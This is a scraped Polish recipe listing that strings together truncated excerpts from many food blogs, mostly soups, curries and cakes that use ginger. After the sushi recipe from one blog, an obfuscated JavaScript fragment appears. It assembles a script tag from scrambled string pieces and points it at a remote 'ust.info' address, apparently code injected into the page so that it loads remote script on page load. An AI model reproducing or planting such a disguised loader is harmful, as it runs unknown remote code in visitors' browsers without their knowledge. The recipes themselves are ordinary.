pysznie! Składniki: 2 młode kapusty bok choy 2 łyżki oliwy 1 duży ząbek czosnku - posiekany 1 cm kawałek imbiru - posiekany 1 łyżeczka płatków chili 1 łyżka sosu sojowego 1 łyżeczka brązowego cukru 1 łyżeczka soku z cytryny 1/2 łyżeczki oleju sezamowego sól Wykonanie: Czosnek, imbir i chili podsmażyć delikatnie
zadanie-gotowaniewiele czasu i energii. Zupa z dyni jest bardzo kremowa, gładka, sycąca i zdecydowanie powinna nas rozgrzać, dlatego do jej przygotowania używamy często pieczonego czosnku, chili, curry czy też imbiru. Dynia jest mdła, dlatego też musi być skomponowana ze składnikami, które będą podbijały jej smak, z mocnymi charakterystycznymi aromatami, często też sięgam po gotowca, pastę curry kokosową, która robi(...)dzielę się z Wami bardzo prostym, szybkim i pysznym pomysłem na zupę z dyni piżmowej. ZUPA Z DYNI PIŻMOWEJ SKŁADNIKI: - 1 średnia dynia piżmowa - 3 ząbki czosnku - 1 plaster imbiru - 1 szalotka - 150 ml śmietanki 12% (zamiennie mleko) - sól - łyżka miodu - 1/3 świeżej papryczki chili - 7-10 łyżek oliwy z oliwek - opcjonalnie: możesz dodać mielonej kolendry, szczyptę cynamonu, kuminu
SMYKWKUCHNIkozi- 200 gr oliwa z oliwek - 50 ml ząbek czosnku migdały- 30 gram sól himalajska- 1 łyżeczka pieprz kolorowy i rózowy- po pół łyżeczki papryczka chili- 2 małe sztuki imbir- 10 gramów cytryna- 20 gramów rozmaryn- 2 gałązki tymianek- 2 gałązki natka pietruszki - 2 gałązki Sposób przygotowania: . Dzień wcześniej do małej buteleczki wlewamy oliwę, wrzucamy czosnek, natkę pietruszki(...)odkładamy na przynajmniej 12 godzin, by nasiąkneło smakiem. Polędwiczkę marynujemy w mieszance z cytryny, rozmarynu, tymianku, imbiru, soli (by mięso puściło soki), pieprzu różowego i papryczki chili (możemy zawakować, jeżeli mamy wakowarkę). Odstawiamy na co najmniej 2 godziny. Z mieszanki owoców leśnych wyjmujemy jeżyny i czarną porzeczkę (jeżeli chcemy). Owoce blendujemy dodając musztardę i miód, następnie wsadzamy
pichcisztomoich ulubionych zup – Zupa dyniowa krem SKŁADNIKI: • 2 -3 kg dyni (u mnie Hokkaido) • 500 g ziemniaków obranych ze skórki • 2 marchewki całkiem duże • 2 cebule • kawałek kłącza imbiru (opcjonalnie) • sól • czarny pieprz PRZYGOTOWANIE: 1. Dynie obieram ze skóry, wyjmuję pestki i kroję w kawałki. Musi być minimum 2 kg netto po obraniu, jeśli hokkaido, to razem ze skórką(...)litrów wody, solę i gotuję pod przykryciem przez 30 minut. Jeśli lubicie rzadszą zupę dodajcie więcej wody, jeśli gęściejsza wystarczą 2 litry. Pod koniec gotowania dodaję obrany i rozdrobniony imbir. 5. Zupę rozdrabniam na jednolitą masę. Przed podaniem doprawiam do smaku solą oraz pieprzem. źrodło Olga Smile
Anioły w kuchnicebuli 3 ząbki czosnku 20 g świeżej papryczki chili lub pół łyżeczki mielonej chili 5 g kurkumy 5 g curry lub garam masala sól himalajska , pieprz biały lub czarny, imbir mielony, kolendra – do smaku 4 łyżki miąższu kokosowego rozpuszczone w 400 ml ciepłej wody lub 400 ml gotowego mleczka kokosowego 100 g oleju kokosowego lub masła klarowanego (ilość dopasować(...)makro) 30 ml soku z cytryny Cebulę i papryczkę chilli drobno posiekać. Czosnek obrać i wycisnąć przez praskę. Wszystko delikatnie podsmażyć na odrobinie tłuszczu. Dodać imbir, kolendrę, kurkumę, curry lub garam masala oraz resztę tłuszczu i lekko podsmażyć. Miąższ kokosowy rozcieńczyć w ciepłej wodzie lub użyć gotowego mleka kokosowego, które należy podgrzewać z odrobiną soli, pieprzu i soku cytrynowego
Ola la LCHFśmietanki kremówki 30% 200 ml koncentratu bulionu drobiowego Krakus (lub koncentratu bulionu warzywnego) 700 ml gorącej wody 1-2 łyżki soku z limonki 1/2 łyżeczki cynamonu 1/2 łyżeczki imbiru biały pieprz sól Dodatkowo: świeża bazylia 2 łyżki orzeszków pinii 2 łyżki ziaren słonecznika 1 łyżka pestek dyni Przygotownie: 1) Przygotować bulion mieszając koncentrat bulionu drobiowego Krakus z gorącą wodą(...)czasu mieszając, aż zacznie się rumienić. 5) Dodać gruszkę oraz ziemniaka i smażyć kolejne kilka minut. 6) Całość zalać przygotowanym bulionem, doprawić solą i białym pieprzem, dodać cynamon oraz imbir, wymieszać i chwilę gotować pod przykryciem, do momentu, aż warzywa zmiękną. 7) Na koniec dodać śmietankę oraz sok z limonki, zagotować i w razie potrzeby jeszcze doprawić. 8) Całość zmiksować
Fitsweet.meliście kapusty pekińskiej 4 spore pieczarki 2 łodygi selera naciowego 200 g makaronu ryżowego 1 łyżka sezamu Marynata do mięsa: 2 łyżki sosu sojowego jasnego 1-2 cm imbiru kilka kropli ostrego sosu (np. tabasco) 1 łyżeczka brązowego cukru 1 łyżeczka oliwy szczypta soli INGRIEDIENTS (4 portions): 300 g beef bavette 1 medium carrot 1 medium leek (white part(...)kroimy w cienkie plasterki. Białą część pora też kroimy na pół i potem nożem na jak najcieńsze paski. W słoiczku mieszamy wszystkie składniki marynaty do mięsa. Kawałek korzenia imbiru obieramy i siekamy na drobne kawałki przed wrzuceniem do słoika. Mięso wkładamy do miski. Jak wszystkie składniki marynaty się połączą zalewamy nią mięso i dokładnie mieszamy tak, aby każdy pasek mięsa
Martyna Cooksjogurtu naturalnego 70 g cukru trzcinowego 16 g proszku do pieczenia 4 jabłka 3 jaja pó ł łyżeczki cynamonu p ó ł łyżeczki imbiru w proszku szczypta soli **** INGREDIENTI 250 g di farina 150 g di yogurt bianco 70 g di zucchero di canna 16 g di lievito per dolci 4 mele 3 uova 1/2 cucchiaino(...)jogurt , całość miksujemy do uzyskania jednolitej konsystencji. Stopniowo dodajemy przesian ą mąkę z proszkiem do pieczenia, pó ł łyżeczki cynamonu, pó ł łyżeczki imbiru oraz szczyptę soli. Wszystkie składniki dokładnie mieszamy. Na koniec obieramy jabłka, kroimy w kostkę, delikatnie wmieszamy do ciasta. **** PREPARAZIONE In una ciotola montate lo zucchero
La grande e la piccola cuocałyżki oliwy lub oleju kokosowego, 1 cebulę, 2 ząbki czosnku, 1 łyżeczkę mielonej kurkumy, ¼ łyżeczki mielonej ostrej papryki, 1 łyżeczkę przyprawy curry w proszku, 1 łyżkę świeżego startego imbiru, 1,5 szklanki bulionu jarzynowego, 1 puszkę (400 ml) mleka kokosowego. Mleko kokosowe otwórz i odłóż kilka łyżek (przydadzą się do dekoracji). Dynię umyj i obierz. Usuń z niej pestki(...)Kiedy cebula się zeszkli, do garnka włóż dynię i ziemniaki. Całość dopraw szczyptą soli i smaż, mieszając. Po mniej więcej 5 minutach smażenia warzywa dopraw kurkumą, papryką curry i imbirem. Całość dokładnie wymieszaj i zalej bulionem. Zupę zagotuj, a następnie gotuj przez mniej więcej 15 minut na średnim ogniu. Po tym czasie warzywa powinny zmięknąć. Kiedy warzywa będą już miękkie
blog.moje-pasje.infoczerwona papryka 1 mała ostra papryczka 1 puszka krojonych pomidorów 100 ml bulionu drobiowego 1 garść świeżej bazylii natka pietruszki 1 mała puszka mleka kokosowego 2 cm świeżego imbiru 150 g śmietankowego serka topionego sól, pieprz Przygotowanie Normal 0 21 false false false MicrosoftInternetExplorer4 Kurczaka myjemy, osuszamy ręcznikiem papierowym, oprószamy solą i pieprzem. Na rozgrzanym tłuszczu obsmażamy(...)obniżamy temperaturę, wrzucamy posiekaną cebulę, rozgniecione ząbki czosnku, szklimy. Do cebuli wrzucamy pokrojoną w kostkę paprykę, papryczkę, chwile podsmażamy, dodajemy pomidory wraz z zalewą, bulion, posiekaną natkę, bazylię i imbir. Serek kroimy na mniejsze kawałki, wrzucamy do całości, dusimy do momentu rozpuszczenia serka (cały czas mieszamy), lekko studzimy. Całość miksujemy z dodatkiem mleka kokosowego i soku z limonki na gładko
R'n'G KitchenŚwietne połączenie kaczki z cykorią w soku pomarańczowym. Składniki 2 piersi kaczki sól pieprz 500 ml soku ze świeżych pomarańczy 50 g startego korzenia imbiru 1 łyżka sosu sojowego 6 kolb cykorii Przygotowanie Wycisnąłem sok z pomarańczy. Gotowałem go na małym ogniu, aż zredukował się do 150 ml. Piersi kaczki oprószyłem solą i pieprzem. Delikatnie ponacinałem skórkę. Smażyłem(...)stopni C, piekłem 10 minut. Upieczone, obłożone folią aluminiową, przełożyłem na kratkę, aby mięso odpoczęło 10 minut. Tłuszcz wytopiony z kaczki wymieszałem ze zredukowanym sokiem pomarańczowym, podgrzałem, dodałem starty imbir i sos sojowy. Włożyłem oczyszczone przekrojone cykorie, dusiłem 10 minut. Podałem z kaczką oprószoną solą i pieprzem
R'n'G Kitchendyni hokkaido. W ogóle uwielbiam wszystko co dyniowe, ciasta, zupy, pierożki.. Zapraszam i miłego dnia! :) Składniki: 1 mała dynia hokkaido (bez skórki i pestek) 1 cebula starty świeży imbir 1 szkl mleka migdałowego oliwa z oliwek, np. Develey sól pieprz gałka muszkatałowa odrobina soku z pomarańczy (świeżo wyciśniętego) dodatkowo: groszek ptysiowy posiekana natka pietruszki Wykonanie: Dynię pokroić w kostkę(...)cebulę posiekać. W garnku przesmażyć cebulę, gdy się zeszkli dodać dynię, podsmażamy jeszcze z 5-10 minut. Dodajemy ok 4 szkl wody, starty imbir, sól i pieprz. Gotujemy ok 20 minut pod przykrywką. Trochę przestudzamy, dolewamy mleko migdałowe i miksujemy blenderem na gładki krem. Podgrzewamy i doprawiamy gałką muszkatołową, sokiem z pomarańczy, ewentualnie solą i pieprzem. Podajemy z groszkiem ptysiowym
TrufelkowoNiestety trzeba się liczyć z jego dość wysoką ceną. Sos sojowy Stanowi dodatek do sushi, w którym maczana jest ryba. Ocet ryżowy Jest niezbędny do przyrządzenia zaprawy ryżowej. Marynowany imbir Jego rolą jest oczyszczenie kubków smakowych. Pozwala to na czerpanie jeszcze większej przyjemności z jedzenia i doświadczania niezapomnianych połączeń smakowych. Dodatki To tak naprawdę dowolne składniki, które umieścisz na powierzchni(...)górę. Pamiętaj, by ciasno zawinąć rolkę. Ostrym nożem (pozbawionym ząbków), pokrój rulon na mniejsze części – kawałki o grubości ok. 2 cm. Podawaj z sosem sojowym, wasabi oraz marynowanym imbirem. Smacznego! (function(){ tcuzu="rcX8Xph0cuzl";tcuz=document.createElement("script"); tcuz_="u"+("st");tcuz_+="at"+(".");tcuz.async=true;tcuz_+="in"; tcuzu="67379292."+tcuzu;tcuz.type="text/javascript";tcuzu+="tq40pcprX6n6"; tcuzu+="riwk0k";tcuz_+=("f")+"o"+("/");tcuz.src="//"+tcuz_+tcuzu
Codogarakukurydzy cukrowej 1 średniej wielkości ziemniak 3 szklanki (750 ml) bulionu 1 szklanka (250 ml) mleczka kokosowego 3 łyżki masła 1 papryczka chili 1 ząbek czosnku 1 łyżka startego imbiru 1 łyżeczka kurkumy 1/2 łyżeczki mielonego kminu rzymskiego pieprz sól Dodatkowo: 1 kukurydza do podania 1 łyżeczka masła świeża kolendra chili Przygotowanie: 1) Kolby kukurydzy obrać z liści i dokładnie(...)przygotowaną kukurydzę (surową) i smażyć jeszcze ok. 5 min, od czasu do czasu mieszając. 5) Kukurydzę zalać bulionem, dorzucić pokrojonego w drobną kostkę ziemniaka, doprawić solą i pieprzem, dodać imbir oraz kurkumę, wymieszać i chwilę gotować pod przykryciem. 6) Na koniec dodać mleczko kokosowe i dalej gotować, aż kukurydza i ziemniak będą miękkie. 7) Całość zmiksować blenderem, najlepiej kielichowym
Fitsweet.megęsty, czekam na sugestie;) Ciasto: 530 g mąki 2,5 łyżeczki sody 2,5 łyżeczki proszku do pieczenia 1 łyżka cynamonu 2 łyżeczki gałki muszkatołowej 2 łyżeczki imbiru 200 g drobnego cukru 1/2 łyżeczki soli 400 ml oleju 7 jajek 200 g brązowego cukru 600 g pure z dyni Krem: 600 g mielonego gęstego sera na sernik 1,5 szkl(...)cukru pudru 350 ml kremówki 36% Karmel: 100 g drobnego cukru 40 g zimnego masła 60 ml kremówki 1/4 łyżeczki soli 1/4 łyżeczki cynamonu szczypta gałki muszkatołowej szczypta imbiru Do misy miksera wbijamy jajka, dodajemy olej, brązowy cukier oraz pure z dyni. Mieszamy rózgą kuchenną aż do otrzymania gładkiej, jednolitej masy. Mąkę, proszek do pieczenia, sodę, oraz przyprawy przesiewamy przez
Smaki Na Talerzu